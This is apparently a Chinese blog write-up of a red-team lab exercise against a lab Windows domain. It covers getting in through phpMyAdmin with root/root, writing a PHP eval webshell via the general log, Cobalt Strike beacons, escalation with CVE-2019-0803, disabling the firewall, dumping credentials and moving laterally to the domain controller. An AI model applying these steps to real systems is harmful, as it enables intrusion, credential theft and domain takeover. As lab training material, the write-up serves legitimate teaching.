靶场 | 4分钟
ATT&CK实战系列——红队实战(一)
二月 15, 2023
红日靶场

靶机搭建就不说了,之前做过视频

现在环境和密码是改好的

网络配置

Win7:

Win2008:

Win2K3:

IP
攻击机(物理机)192.168.55.1
Win7内:192.168.52.143 / 外:192.168.55.128
Win2008192.168.52.138
Win2K3192.168.52.141

外网打点

先查看Web服务器IP:

外网:

内网:

开启PHPStudy

访问是个探针,里面包含了站点绝对路径,php版本等信息

扫描目录

发现了phpinfo、phpmyadmin等信息

弱口令root/root进入后台

这里使用phpmyadmin日志写shell,先查看有没有开启日志

SHOW VARIABLES LIKE "%SECURE%"

这里开启日志

SET GLOBAL general\_log = 'on'

设置日志路径,绝对路径在探针里有的

SET GLOBAL general\_log\_file = "C://phpStudy/WWW//shell.php"

设置成功后写马

SELECT "<?php @eval($\_POST\['x'\]);?>"

蚁剑连接

内网信息搜集

在蚁剑的命令行执行相关命令即可

两张网卡分别是内外网

查看当前登录的域和登录用户信息

有三台主机

域为GOD,DNS为god.org

查看域控

查看域管

查看域成员

信息搜集完成,下一步更深层次的上线CS再进行

CS生成一个马,通过蚁剑上传到服务器,然后终端里执行即可

成功上线

深层次的信息搜集

查看主机名

shell net users

查看用户列表

shell net users

查看域管

shell net localgroup administrators

接下来对拿下的web服务器提权

查看系统版本

systeminfo

提权

搜不到对应的提权EXP

尝试经典的CVE-2019-0803吧

上传CVE-2019-0803.exe到服务器,然后执行命令

shell CVE-2019-0803.exe cmd "start ta.exe"

随后上线system权限的机器

查看任务列表

shell tasklist

没有防护软件(肯定没有,不然我那个无免杀的CS马早被杀了)

查看防火墙状态

shell netsh firewall show state

关闭防火墙

shell netsh advfirewall set allprofile state off

域渗透

查看当前域内列表

net view

在CS执行成功后,它自己会将这些主机添加进去

查看域控列表

net dclist

这里先抓取服务器凭证

抓取明文密码

创建SMB监听器

可以看到拿下域控OWA

然后使用OWA的session去打另一个

拿下

小知识:

1、提权把systeminfo信息放一些在线查询的网站上搜可利用的提权方式即可,我这个就是搜到的CVE-2019-0803,这个工具执行命令权限很高,运行之前的CS马就会以system权限上线

2、后面那些psexec、smb是什么?psexec是微软的一个工具,可以用它来提权,而这里它的原理就是通过命名管道使用SMB服务在远程主机上执行powershell